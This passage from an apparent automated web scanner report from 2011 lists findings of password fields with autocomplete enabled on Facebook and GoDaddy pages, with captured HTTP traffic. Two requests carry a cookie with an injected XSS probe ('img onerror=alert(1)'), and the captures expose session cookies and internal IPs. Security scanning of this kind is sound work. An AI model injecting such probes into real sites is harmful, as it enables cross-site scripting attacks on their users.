<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.62. http://www.facebook.com/policy.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.63. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.64. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

12.65. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php?locale=en_US

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /r.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

12.66. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.67. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Bucky-Jordan/100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

12.68. http://www.facebook.com/robynalys previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/robynalys

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.69. http://www.facebook.com/share.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1&display=popup

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.70. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1&display=popup

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.71. http://www.facebook.com/skdarealist previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/skdarealist

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.72. http://www.facebook.com/sportingnews previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sportingnews

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.73. http://www.facebook.com/stefanoboscolomarchi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/stefanoboscolomarchi

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.74. http://www.facebook.com/techcrunch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/techcrunch

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.75. http://www.facebook.com/terms.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.76. http://www.facebook.com/theteebers previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/theteebers

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.77. http://www.facebook.com/wmoppert previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/wmoppert

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.78. https://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.79. https://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.80. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.81. https://www.facebook.com/h02332 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.82. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.83. https://www.facebook.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.84. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.85. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.86. https://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/r.php

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

12.87. https://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.88. https://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/r.php?locale=en_US

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

12.89. https://www.facebook.com/recover.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.90. https://www.godaddy.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
